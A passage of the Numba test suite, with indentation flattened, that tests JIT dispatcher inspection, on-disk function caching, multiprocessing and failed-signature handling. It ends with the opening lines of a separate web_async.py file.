# .display() requires an optional dependency on `graphviz`.
# just test for the attribute without running it.
self.assertTrue(callable(cfg.display))
def test_inspect_cfg(self):
# Exercise the .inspect_cfg(). These are minimal tests and do not fully
# check the correctness of the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg() without arguments
cfgs = foo.inspect_cfg()
# Correct count of overloads
self.assertEqual(len(cfgs), 3)
# Makes sure all the signatures are correct
[s1, s2, s3] = cfgs.keys()
self.assertEqual(set([s1, s2, s3]),
set(map(lambda x: (typeof(x),), [a1, a2, a3])))
for cfg in cfgs.values():
self._check_cfg_display(cfg)
self.assertEqual(len(list(cfgs.values())), 3)
# Call inspect_cfg(signature)
cfg = foo.inspect_cfg(signature=foo.signatures[0])
self._check_cfg_display(cfg)
def test_inspect_cfg_with_python_wrapper(self):
# Exercise the .inspect_cfg() including the python wrapper.
# These are minimal tests and do not fully check the correctness of
# the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg(signature, show_wrapper="python")
cfg = foo.inspect_cfg(signature=foo.signatures[0],
show_wrapper="python")
self._check_cfg_display(cfg, wrapper='cpython')
def test_inspect_types(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method
foo.inspect_types(StringIO())
# Test output
expected = str(foo.overloads[foo.signatures[0]].type_annotation)
with captured_stdout() as out:
foo.inspect_types()
assert expected in out.getvalue()
def test_inspect_types_with_signature(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.0)
# Inspect all signatures
with captured_stdout() as total:
foo.inspect_types()
# Inspect first signature
with captured_stdout() as first:
foo.inspect_types(signature=foo.signatures[0])
# Inspect second signature
with captured_stdout() as second:
foo.inspect_types(signature=foo.signatures[1])
self.assertEqual(total.getvalue(), first.getvalue() + second.getvalue())
@unittest.skipIf(jinja2 is None, "please install the 'jinja2' package")
@unittest.skipIf(pygments is None, "please install the 'pygments' package")
def test_inspect_types_pretty(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method, dump the output
with captured_stdout():
ann = foo.inspect_types(pretty=True)
# ensure HTML <span> is found in the annotation output
for k, v in ann.ann.items():
span_found = False
for line in v['pygments_lines']:
if 'span' in line[2]:
span_found = True
self.assertTrue(span_found)
# check that file+pretty kwarg combo raises
with self.assertRaises(ValueError) as raises:
foo.inspect_types(file=StringIO(), pretty=True)
self.assertIn("`file` must be None if `pretty=True`",
str(raises.exception))
def test_get_annotation_info(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.3)
expected = dict(chain.from_iterable(foo.get_annotation_info(i).items()
for i in foo.signatures))
result = foo.get_annotation_info()
self.assertEqual(expected, result)
def test_issue_with_array_layout_conflict(self):
"""
This test an issue with the dispatcher when an array that is both
C and F contiguous is supplied as the first signature.
The dispatcher checks for F contiguous first but the compiler checks
for C contiguous first. This results in an C contiguous code inserted
as F contiguous function.
"""
def pyfunc(A, i, j):
return A[i, j]
cfunc = jit(pyfunc)
ary_c_and_f = np.array([[1.]])
ary_c = np.array([[0., 1.], [2., 3.]], order='C')
ary_f = np.array([[0., 1.], [2., 3.]], order='F')
exp_c = pyfunc(ary_c, 1, 0)
exp_f = pyfunc(ary_f, 1, 0)
self.assertEqual(1., cfunc(ary_c_and_f, 0, 0))
got_c = cfunc(ary_c, 1, 0)
got_f = cfunc(ary_f, 1, 0)
self.assertEqual(exp_c, got_c)
self.assertEqual(exp_f, got_f)
class BaseCacheTest(TestCase):
# This class is also used in test_cfunc.py.
# The source file that will be copied
usecases_file = None
# Make sure this doesn't conflict with another module
modname = None
def setUp(self):
self.tempdir = temp_directory('test_cache')
sys.path.insert(0, self.tempdir)
self.modfile = os.path.join(self.tempdir, self.modname + ".py")
self.cache_dir = os.path.join(self.tempdir, "__pycache__")
shutil.copy(self.usecases_file, self.modfile)
self.maxDiff = None
def tearDown(self):
sys.modules.pop(self.modname, None)
sys.path.remove(self.tempdir)
def import_module(self):
# Import a fresh version of the test module. All jitted functions
# in the test module will start anew and load overloads from
# the on-disk cache if possible.
old = sys.modules.pop(self.modname, None)
if old is not None:
# Make sure cached bytecode is removed
cached = [old.__cached__]
for fn in cached:
try:
os.unlink(fn)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mod = import_dynamic(self.modname)
self.assertEqual(mod.__file__.rstrip('co'), self.modfile)
return mod
def cache_contents(self):
try:
return [fn for fn in os.listdir(self.cache_dir)
if not fn.endswith(('.pyc', ".pyo"))]
except OSError as e:
if e.errno != errno.ENOENT:
raise
return []
def get_cache_mtimes(self):
return dict((fn, os.path.getmtime(os.path.join(self.cache_dir, fn)))
for fn in sorted(self.cache_contents()))
def check_pycache(self, n):
c = self.cache_contents()
self.assertEqual(len(c), n, c)
def dummy_test(self):
pass
class BaseCacheUsecasesTest(BaseCacheTest):
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def run_in_separate_process(self):
# Cached functions can be run from a distinct process.
# Also stresses issue #1603: uncached function calling cached function
# shouldn't fail compiling.
code = """if 1:
import sys
sys.path.insert(0, %(tempdir)r)
mod = __import__(%(modname)r)
mod.self_test()
""" % dict(tempdir=self.tempdir, modname=self.modname)
popen = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError(
"process failed with code %s: \n"
"stdout follows\n%s\n"
"stderr follows\n%s\n"
% (popen.returncode, out.decode(), err.decode()),
)
def check_module(self, mod):
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
mod.self_test()
def check_hits(self, func, hits, misses=None):
st = func.stats
self.assertEqual(sum(st.cache_hits.values()), hits, st.cache_hits)
if misses is not None:
self.assertEqual(sum(st.cache_misses.values()), misses,
st.cache_misses)
class TestCache(BaseCacheUsecasesTest):
def test_caching(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
self.check_hits(f, 0, 2)
f = mod.record_return
rec = f(mod.aligned_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
rec = f(mod.packed_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
self.check_pycache(9) # 3 index, 6 data
self.check_hits(f, 0, 2)
f = mod.generated_usecase
self.assertPreciseEqual(f(3, 2), 1)
self.assertPreciseEqual(f(3j, 2), 2 + 3j)
# Check the code runs ok from another process
self.run_in_separate_process()
def test_caching_nrt_pruned(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
# NRT pruning may affect cache
self.assertPreciseEqual(f(2, np.arange(3)), 2 + np.arange(3) + 1)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
def test_inner_then_outer(self):
# Caching inner then outer function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.inner(3, 2), 6)
self.check_pycache(2) # 1 index, 1 data
# Uncached outer function shouldn't fail (issue #1603)
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
mod = self.import_module()
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
# Cached outer will create new cache entries
f = mod.outer
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(f(3.5, 2), 2.5)
self.check_pycache(6) # 2 index, 4 data
def test_outer_then_inner(self):
# Caching outer then inner function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.outer(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(mod.outer_uncached(3, 2), 2)
self.check_pycache(4) # same
mod = self.import_module()
f = mod.inner
self.assertPreciseEqual(f(3, 2), 6)
self.check_pycache(4) # same
self.assertPreciseEqual(f(3.5, 2), 6.5)
self.check_pycache(5) # 2 index, 3 data
def test_no_caching(self):
mod = self.import_module()
f = mod.add_nocache_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(0)
def test_looplifted(self):
# Loop-lifted functions can't be cached and raise a warning
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.looplifted
self.assertPreciseEqual(f(4), 6)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "looplifted" '
'as it uses lifted code', str(w[0].message))
def test_big_array(self):
# Code references big array globals cannot be cached
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_big_array
np.testing.assert_equal(f(), mod.biggie)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_big_array" '
'as it uses dynamic globals', str(w[0].message))
def test_ctypes(self):
# Functions using a ctypes pointer can't be cached and raise
# a warning.
mod = self.import_module()
for f in [mod.use_c_sin, mod.use_c_sin_nest1, mod.use_c_sin_nest2]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
self.assertPreciseEqual(f(0.0), 0.0)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn(
'Cannot cache compiled function "{}"'.format(f.__name__),
str(w[0].message),
)
def test_closure(self):
mod = self.import_module()
with warnings.catch_warnings():
warnings.simplefilter('error', NumbaWarning)
f = mod.closure1
self.assertPreciseEqual(f(3), 6) # 3 + 3 = 6
f = mod.closure2
self.assertPreciseEqual(f(3), 8) # 3 + 5 = 8
f = mod.closure3
self.assertPreciseEqual(f(3), 10) # 3 + 7 = 8
f = mod.closure4
self.assertPreciseEqual(f(3), 12) # 3 + 9 = 12
self.check_pycache(5) # 1 nbi, 4 nbc
def test_cache_reuse(self):
mod = self.import_module()
mod.add_usecase(2, 3)
mod.add_usecase(2.5, 3.5)
mod.add_objmode_usecase(2, 3)
mod.outer_uncached(2, 3)
mod.outer(2, 3)
mod.record_return(mod.packed_arr, 0)
mod.record_return(mod.aligned_arr, 1)
mod.generated_usecase(2, 3)
mtimes = self.get_cache_mtimes()
# Two signatures compiled
self.check_hits(mod.add_usecase, 0, 2)
mod2 = self.import_module()
self.assertIsNot(mod, mod2)
f = mod2.add_usecase
f(2, 3)
self.check_hits(f, 1, 0)
f(2.5, 3.5)
self.check_hits(f, 2, 0)
f = mod2.add_objmode_usecase
f(2, 3)
self.check_hits(f, 1, 0)
# The files haven't changed
self.assertEqual(self.get_cache_mtimes(), mtimes)
self.run_in_separate_process()
self.assertEqual(self.get_cache_mtimes(), mtimes)
def test_cache_invalidate(self):
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
# This should change the functions' results
with open(self.modfile, "a") as f:
f.write("\nZ = 10\n")
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_recompile(self):
# Explicit call to recompile() should overwrite the cache
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
mod = self.import_module()
f = mod.add_usecase
mod.Z = 10
self.assertPreciseEqual(f(2, 3), 6)
f.recompile()
self.assertPreciseEqual(f(2, 3), 15)
# Freshly recompiled version is re-used from other imports
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_same_names(self):
# Function with the same names should still disambiguate
mod = self.import_module()
f = mod.renamed_function1
self.assertPreciseEqual(f(2), 4)
f = mod.renamed_function2
self.assertPreciseEqual(f(2), 8)
def test_frozen(self):
from .dummy_module import function
old_code = function.__code__
code_obj = compile('pass', 'tests/dummy_module.py', 'exec')
try:
function.__code__ = code_obj
source = inspect.getfile(function)
# doesn't return anything, since it cannot find the module
# fails unless the executable is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsNone(locator)
sys.frozen = True
# returns a cache locator object, only works when the executable
# is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsInstance(locator, _UserWideCacheLocator)
finally:
function.__code__ = old_code
del sys.frozen
def _test_pycache_fallback(self):
"""
With a disabled __pycache__, test there is a working fallback
(e.g. on the user-wide cache dir)
"""
mod = self.import_module()
f = mod.add_usecase
# Remove this function's cache files at the end, to avoid accumulation
# across test calls.
self.addCleanup(shutil.rmtree, f.stats.cache_path, ignore_errors=True)
self.assertPreciseEqual(f(2, 3), 6)
# It's a cache miss since the file was copied to a new temp location
self.check_hits(f, 0, 1)
# Test re-use
mod2 = self.import_module()
f = mod2.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_hits(f, 1, 0)
# The __pycache__ is empty (otherwise the test's preconditions
# wouldn't be met)
self.check_pycache(0)
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_creatable_pycache(self):
# Make it impossible to create the __pycache__ directory
old_perms = os.stat(self.tempdir).st_mode
os.chmod(self.tempdir, 0o500)
self.addCleanup(os.chmod, self.tempdir, old_perms)
self._test_pycache_fallback()
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_writable_pycache(self):
# Make it impossible to write to the __pycache__ directory
pycache = os.path.join(self.tempdir, '__pycache__')
os.mkdir(pycache)
old_perms = os.stat(pycache).st_mode
os.chmod(pycache, 0o500)
self.addCleanup(os.chmod, pycache, old_perms)
self._test_pycache_fallback()
def test_ipython(self):
# Test caching in an IPython session
base_cmd = [sys.executable, '-m', 'IPython']
base_cmd += ['--quiet', '--quick', '--no-banner', '--colors=NoColor']
try:
ver = subprocess.check_output(base_cmd + ['--version'])
except subprocess.CalledProcessError as e:
self.skipTest("ipython not available: return code %d"
% e.returncode)
ver = ver.strip().decode()
print("ipython version:", ver)
# Create test input
inputfn = os.path.join(self.tempdir, "ipython_cache_usecase.txt")
with open(inputfn, "w") as f:
f.write(r"""
import os
import sys
from numba import jit
# IPython 5 does not support multiline input if stdin isn't
# a tty (https://github.com/ipython/ipython/issues/9752)
f = jit(cache=True)(lambda: 42)
res = f()
# IPython writes on stdout, so use stderr instead
sys.stderr.write(u"cache hits = %d\n" % f.stats.cache_hits[()])
# IPython hijacks sys.exit(), bypass it
sys.stdout.flush()
sys.stderr.flush()
os._exit(res)
""")
def execute_with_input():
# Feed the test input as stdin, to execute it in REPL context
with open(inputfn, "rb") as stdin:
p = subprocess.Popen(base_cmd, stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
out, err = p.communicate()
if p.returncode != 42:
self.fail("unexpected return code %d\n"
"-- stdout:\n%s\n"
"-- stderr:\n%s\n"
% (p.returncode, out, err))
return err
execute_with_input()
# Run a second time and check caching
err = execute_with_input()
self.assertIn("cache hits = 1", err.strip())
@skip_parfors_unsupported
class TestSequentialParForsCache(BaseCacheUsecasesTest):
def setUp(self):
super(TestSequentialParForsCache, self).setUp()
# Turn on sequential parfor lowering
parfor.sequential_parfor_lowering = True
def tearDown(self):
super(TestSequentialParForsCache, self).tearDown()
# Turn off sequential parfor lowering
parfor.sequential_parfor_lowering = False
def test_caching(self):
mod = self.import_module()
self.check_pycache(0)
f = mod.parfor_usecase
ary = np.ones(10)
self.assertPreciseEqual(f(ary), ary * ary + ary)
dynamic_globals = [cres.library.has_dynamic_globals
for cres in f.overloads.values()]
self.assertEqual(dynamic_globals, [False])
self.check_pycache(2) # 1 index, 1 data
class TestCacheWithCpuSetting(BaseCacheUsecasesTest):
# Disable parallel testing due to envvars modification
_numba_parallel_test_ = False
def check_later_mtimes(self, mtimes_old):
match_count = 0
for k, v in self.get_cache_mtimes().items():
if k in mtimes_old:
self.assertGreaterEqual(v, mtimes_old[k])
match_count += 1
self.assertGreater(match_count, 0,
msg='nothing to compare')
def test_user_set_cpu_name(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU name to generic
with override_env_config('NUMBA_CPU_NAME', 'generic'):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][1] == ll.get_host_cpu_name():
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], codegen.get_host_cpu_features())
self.assertEqual(key_generic[1][1], 'generic')
self.assertEqual(key_generic[1][2], '')
def test_user_set_cpu_features(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU feature
my_cpu_features = '-sse;-avx'
system_features = codegen.get_host_cpu_features()
self.assertNotEqual(system_features, my_cpu_features)
with override_env_config('NUMBA_CPU_FEATURES', my_cpu_features):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][2] == system_features:
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], system_features)
self.assertEqual(key_generic[1][1], ll.get_host_cpu_name())
self.assertEqual(key_generic[1][2], my_cpu_features)
class TestMultiprocessCache(BaseCacheTest):
# Nested multiprocessing.Pool raises AssertionError:
# "daemonic processes are not allowed to have children"
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def test_multiprocessing(self):
# Check caching works from multiple processes at once (#2028)
mod = self.import_module()
# Calling a pure Python caller of the JIT-compiled function is
# necessary to reproduce the issue.
f = mod.simple_usecase_caller
n = 3
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
pool = ctx.Pool(n)
try:
res = sum(pool.imap(f, range(n)))
finally:
pool.close()
self.assertEqual(res, n * (n - 1) // 2)
class TestCacheFileCollision(unittest.TestCase):
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "caching_file_loc_fodder"
source_text_1 = """
from numba import njit
@njit(cache=True)
def bar():
return 123
"""
source_text_2 = """
from numba import njit
@njit(cache=True)
def bar():
return 321
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
sys.path.insert(0, self.tempdir)
self.modname = 'module_name_that_is_unlikely'
self.assertNotIn(self.modname, sys.modules)
self.modname_bar1 = self.modname
self.modname_bar2 = '.'.join([self.modname, 'foo'])
foomod = os.path.join(self.tempdir, self.modname)
os.mkdir(foomod)
with open(os.path.join(foomod, '__init__.py'), 'w') as fout:
print(self.source_text_1, file=fout)
with open(os.path.join(foomod, 'foo.py'), 'w') as fout:
print(self.source_text_2, file=fout)
def tearDown(self):
sys.modules.pop(self.modname_bar1, None)
sys.modules.pop(self.modname_bar2, None)
sys.path.remove(self.tempdir)
def import_bar1(self):
return import_dynamic(self.modname_bar1).bar
def import_bar2(self):
return import_dynamic(self.modname_bar2).bar
def test_file_location(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
# Check that the cache file is named correctly
idxname1 = bar1._cache._cache_file._index_name
idxname2 = bar2._cache._cache_file._index_name
self.assertNotEqual(idxname1, idxname2)
self.assertTrue(idxname1.startswith("__init__.bar-3.py"))
self.assertTrue(idxname2.startswith("foo.bar-3.py"))
@unittest.skipUnless(hasattr(multiprocessing, 'get_context'),
'Test requires multiprocessing.get_context')
def test_no_collision(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
with capture_cache_log() as buf:
res1 = bar1()
cachelog = buf.getvalue()
# bar1 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
with capture_cache_log() as buf:
res2 = bar2()
cachelog = buf.getvalue()
# bar2 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
self.assertNotEqual(res1, res2)
try:
# Make sure we can spawn new process without inheriting
# the parent context.
mp = multiprocessing.get_context('spawn')
except ValueError:
print("missing spawn context")
q = mp.Queue()
# Start new process that calls `cache_file_collision_tester`
proc = mp.Process(target=cache_file_collision_tester,
args=(q, self.tempdir,
self.modname_bar1,
self.modname_bar2))
proc.start()
# Get results from the process
log1 = q.get()
got1 = q.get()
log2 = q.get()
got2 = q.get()
proc.join()
# The remote execution result of bar1() and bar2() should match
# the one executed locally.
self.assertEqual(got1, res1)
self.assertEqual(got2, res2)
# The remote should have loaded bar1 from cache
self.assertEqual(log1.count('index saved'), 0)
self.assertEqual(log1.count('data saved'), 0)
self.assertEqual(log1.count('index loaded'), 1)
self.assertEqual(log1.count('data loaded'), 1)
# The remote should have loaded bar2 from cache
self.assertEqual(log2.count('index saved'), 0)
self.assertEqual(log2.count('data saved'), 0)
self.assertEqual(log2.count('index loaded'), 1)
self.assertEqual(log2.count('data loaded'), 1)
def cache_file_collision_tester(q, tempdir, modname_bar1, modname_bar2):
sys.path.insert(0, tempdir)
bar1 = import_dynamic(modname_bar1).bar
bar2 = import_dynamic(modname_bar2).bar
with capture_cache_log() as buf:
r1 = bar1()
q.put(buf.getvalue())
q.put(r1)
with capture_cache_log() as buf:
r2 = bar2()
q.put(buf.getvalue())
q.put(r2)
class TestCacheMultipleFilesWithSignature(unittest.TestCase):
# Regression test for https://github.com/numba/numba/issues/3658
_numba_parallel_test_ = False
source_text_file1 = """
from file2 import function2
"""
source_text_file2 = """
from numba import njit
@njit('float64(float64)', cache=True)
def function1(x):
return x
@njit('float64(float64)', cache=True)
def function2(x):
return x
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
self.file1 = os.path.join(self.tempdir, 'file1.py')
with open(self.file1, 'w') as fout:
print(self.source_text_file1, file=fout)
self.file2 = os.path.join(self.tempdir, 'file2.py')
with open(self.file2, 'w') as fout:
print(self.source_text_file2, file=fout)
def tearDown(self):
shutil.rmtree(self.tempdir)
def test_caching_mutliple_files_with_signature(self):
# Execute file1.py
popen = subprocess.Popen([sys.executable, self.file1],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
msg = f"stdout:\n{out.decode()}\n\nstderr:\n{err.decode()}"
self.assertEqual(popen.returncode, 0, msg=msg)
# Execute file2.py
popen = subprocess.Popen([sys.executable, self.file2],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
msg = f"stdout:\n{out.decode()}\n\nstderr:\n{err.decode()}"
self.assertEqual(popen.returncode, 0, msg)
class TestDispatcherFunctionBoundaries(TestCase):
def test_pass_dispatcher_as_arg(self):
# Test that a Dispatcher object can be pass as argument
@jit(nopython=True)
def add1(x):
return x + 1
@jit(nopython=True)
def bar(fn, x):
return fn(x)
@jit(nopython=True)
def foo(x):
return bar(add1, x)
# Check dispatcher as argument inside NPM
inputs = [1, 11.1, np.arange(10)]
expected_results = [x + 1 for x in inputs]
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(foo(arg), expect)
# Check dispatcher as argument from python
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(bar(add1, arg), expect)
def test_dispatcher_as_arg_usecase(self):
@jit(nopython=True)
def maximum(seq, cmpfn):
tmp = seq[0]
for each in seq[1:]:
cmpval = cmpfn(tmp, each)
if cmpval < 0:
tmp = each
return tmp
got = maximum([1, 2, 3, 4], cmpfn=jit(lambda x, y: x - y))
self.assertEqual(got, 4)
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[0] - y[0]))
self.assertEqual(got, (4, 0))
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[1] - y[1]))
self.assertEqual(got, (0, 4))
def test_dispatcher_can_return_to_python(self):
@jit(nopython=True)
def foo(fn):
return fn
fn = jit(lambda x: x)
self.assertEqual(foo(fn), fn)
def test_dispatcher_in_sequence_arg(self):
@jit(nopython=True)
def one(x):
return x + 1
@jit(nopython=True)
def two(x):
return one(one(x))
@jit(nopython=True)
def three(x):
return one(one(one(x)))
@jit(nopython=True)
def choose(fns, x):
return fns[0](x), fns[1](x), fns[2](x)
# Tuple case
self.assertEqual(choose((one, two, three), 1), (2, 3, 4))
# List case
self.assertEqual(choose([one, one, one], 1), (2, 2, 2))
class TestBoxingDefaultError(unittest.TestCase):
# Testing default error at boxing/unboxing
def test_unbox_runtime_error(self):
# Dummy type has no unbox support
def foo(x):
pass
cres = compile_isolated(foo, (types.Dummy("dummy_type"),))
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point(None)
self.assertEqual(str(raises.exception), "can't unbox dummy_type type")
def test_box_runtime_error(self):
def foo():
return unittest # Module type has no boxing logic
cres = compile_isolated(foo, ())
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point()
pat = "cannot convert native Module.* to Python object"
self.assertRegexpMatches(str(raises.exception), pat)
class TestNoRetryFailedSignature(unittest.TestCase):
"""Test that failed-to-compile signatures are not recompiled.
"""
def run_test(self, func):
fcom = func._compiler
self.assertEqual(len(fcom._failed_cache), 0)
# expected failure because `int` has no `__getitem__`
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry with double
with self.assertRaises(errors.TypingError):
func(1.0)
self.assertEqual(len(fcom._failed_cache), 2)
def test_direct_call(self):
@jit(nopython=True)
def foo(x):
return x[0]
self.run_test(foo)
def test_nested_call(self):
@jit(nopython=True)
def bar(x):
return x[0]
@jit(nopython=True)
def foobar(x):
bar(x)
@jit(nopython=True)
def foo(x):
return bar(x) + foobar(x)
self.run_test(foo)
def test_error_count(self):
def check(field, would_fail):
# Slightly modified from the reproducer in issue #4117.
# Before the patch, the compilation time of the failing case is
# much longer than of the successful case. This can be detected
# by the number of times `trigger()` is visited.
k = 10
counter = {'c': 0}
@generated_jit
def trigger(x):
# Keep track of every visit
counter['c'] += 1
if would_fail:
raise errors.TypingError("invoke_failed")
return lambda x: x
@jit(nopython=True)
def ident(out, x):
pass
def chain_assign(fs, inner=ident):
tab_head, tab_tail = fs[-1], fs[:-1]
@jit(nopython=True)
def assign(out, x):
inner(out, x)
out[0] += tab_head(x)
if tab_tail:
return chain_assign(tab_tail, assign)
else:
return assign
chain = chain_assign((trigger,) * k)
out = np.ones(2)
if would_fail:
with self.assertRaises(errors.TypingError) as raises:
chain(out, 1)
self.assertIn('invoke_failed', str(raises.exception))
else:
chain(out, 1)
# Returns the visit counts
return counter['c']
ct_ok = check('a', False)
ct_bad = check('c', True)
# `trigger()` is visited exactly once for both successful and failed
# compilation.
self.assertEqual(ct_ok, 1)
self.assertEqual(ct_bad, 1)
@njit
def add_y1(x, y=1):
return x + y
@njit
def add_ynone(x, y=None):
return x + (1 if y else 2)
@njit
def mult(x, y):
return x * y
@njit
def add_func(x, func=mult):
return x + func(x, x)
def _checker(f1, arg):
assert f1(arg) == f1.py_func(arg)
class TestMultiprocessingDefaultParameters(SerialMixin, unittest.TestCase):
def run_fc_multiproc(self, fc):
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
# RE: issue #5973, this doesn't use multiprocessing.Pool.map as doing so
# causes the TBB library to segfault under certain conditions. It's not
# clear whether the cause is something in the complexity of the Pool
# itself, e.g. watcher threads etc, or if it's a problem synonymous with
# a "timing attack".
for a in [1, 2, 3]:
p = ctx.Process(target=_checker, args=(fc, a,))
p.start()
p.join(_TEST_TIMEOUT)
self.assertEqual(p.exitcode, 0)
def test_int_def_param(self):
""" Tests issue #4888"""
self.run_fc_multiproc(add_y1)
def test_none_def_param(self):
""" Tests None as a default parameter"""
self.run_fc_multiproc(add_func)
def test_function_def_param(self):
""" Tests a function as a default parameter"""
self.run_fc_multiproc(add_func)
if __name__ == '__main__':
unittest.main()
|
web_async.py
|
from . import web
import asyncio
import threading
global_event_loop = asyncio.new_event_loop()
